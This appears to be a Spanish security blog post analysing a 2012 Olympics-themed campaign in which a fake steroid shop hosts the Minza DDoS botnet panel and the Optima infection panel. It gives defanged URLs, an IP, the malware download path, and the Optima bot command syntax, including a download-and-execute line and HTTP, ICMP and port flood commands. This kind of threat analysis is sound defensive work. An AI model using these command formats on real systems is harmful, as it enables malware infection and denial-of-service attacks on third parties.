Olimpic Malware: Ataque DDOS + INFECTION

Parece que los ciber-criminales no paran de escudriñar nuevas formas de propagar sus amenazas víricas a través de Internet.

En esta ocasión aprovechando la repercusión mediática de los juegos olímpicos de Londres 2012 han utilizado un ingenioso método para propagar sus muestras de Malware.

Para ello han rizado el rizo creando una supuesta pagina de venta de esteroides y anabolizantes por Internet. Un Mercado ilegal y que genera bastantes ganancias por la venta de estos productos no autorizados sin recetas y cuyos consumidores principalmente son individuos que tratan de emular a los deportistas olímpicos empleando estos compuestos químicos.

La web que han creado los criminales se llama:

hXXp://steroids-buy-anabolic.com/

y esta alojada en la IP 77.79.7.229 de Lituania.

Todavía sorprende más la maquiavélica mente de los criminales cuando al analizar dicha Web se ha localizado un complejo sistema de botnets para realizar ataques por denegación de servicio contra los sitios de Internet con cierta “reputación” dedicados a la venta ilegal de esteroides y así dejarlos inaccesibles a los posibles compradores. Que solo encontraran pues accesible la pagina maliciosa hXXp://steroids-buy-anabolic.com en la cual serán infectados por el Botnet OPTIMA convirtiéndose su equipo en una máquina zombie controlada por dicho Panel

Vamos a entrar en detalle en el analisis de esta infraestructura Botnet de ataques DDOS + INFECTION.

El BOTNET orientado a realizar ataques DDOS se llama Minza y se accede a su panel de Control mediante la URL  hXXp://steroids-buy-anabolic.com/minza/ tal como se observa en la captura:

Una vez que se ha accedido al Panel de Control se puede ver la lista de comandos que se han lanzado para realizar denegaciones de servicios contra las otras webs de comercio de esteroides.

Este BOTNET controla 19147 maquinas zombies para lanzar ataques sincronizados contra las paginas indicadas ordenando a dichos ordenadores que realicen peticiones masivas al mismo tiempo contra dichas Webs y así colapsar sus servidores.

Uno de estos sitios ilegales de venta de esteroides contra los que se ha realizado el ataque ha sido:

Los comandos que pueden ejecutarse desde el Panel de Control del Botnet son:

 

  Los cuales permiten que la máquina zombie realice denegaciones de servicio mediante desbordamiento TPC , UDP o HTTP , así como descargar otros ejecutables en la máquina infectada. Actualizar la versión del troyano , y también autoeliminarse para no dejar rastro de la infección en el equipo comprometido.

El Panel de Control además permite realizar un seguimiento de las acciones de los BOTS comprometidos.

Para la infraestructura de infección se ha empleado el Panel de Control del BOTNET OPTIMA creado por el grupo Darkness.

A este panel de control se accede mediante la URL:

hXXp://steroids-buy-anabolic.com/adm/

Y su pantalla de acceso muestra el siguiente aspecto:

Una vez que se ha accedido al Panel de Control nos aparece toda la información relativa a los botnets que contiene y las ordenes que están ejecutando en las máquinas infectadas.

El binario malicioso que descargaba en las máquinas comprometidas era:

exe=hXXp://steroids-buy-anabolic.com/upd1.exe

Que actualmente ha sido eliminado.

La primera infección se realizó el día 2012-05-25 a las16:14:47, unos meses anteriores al inicio de los juegos olímpicos,  y controla en total 7763 bots.

La lista de comandos que puede ejecutar en los equipos comprometidos son:

exe=http://host.com/exe.exe   -->  Descarga y ejecuta un binario malicioso

dd1=http://host.com/script.php|5  -->  Inicia ataque desbordamiento http

dd2=host.com|5   -->  Inicia ataque desbordamiento icmp

dd3=host.com:21  -->  Inicia ataque desbordamiento contra el puerto indicado

tot=10 -->  Sincroniza los bots con el tiempo indicado

vot=http://host.com/vote.php   -->  Voting

wtf   -->   Detiene la ejecución de estos comandos.

A continuación se muestra el registro de Bots que controla el Panel Optima: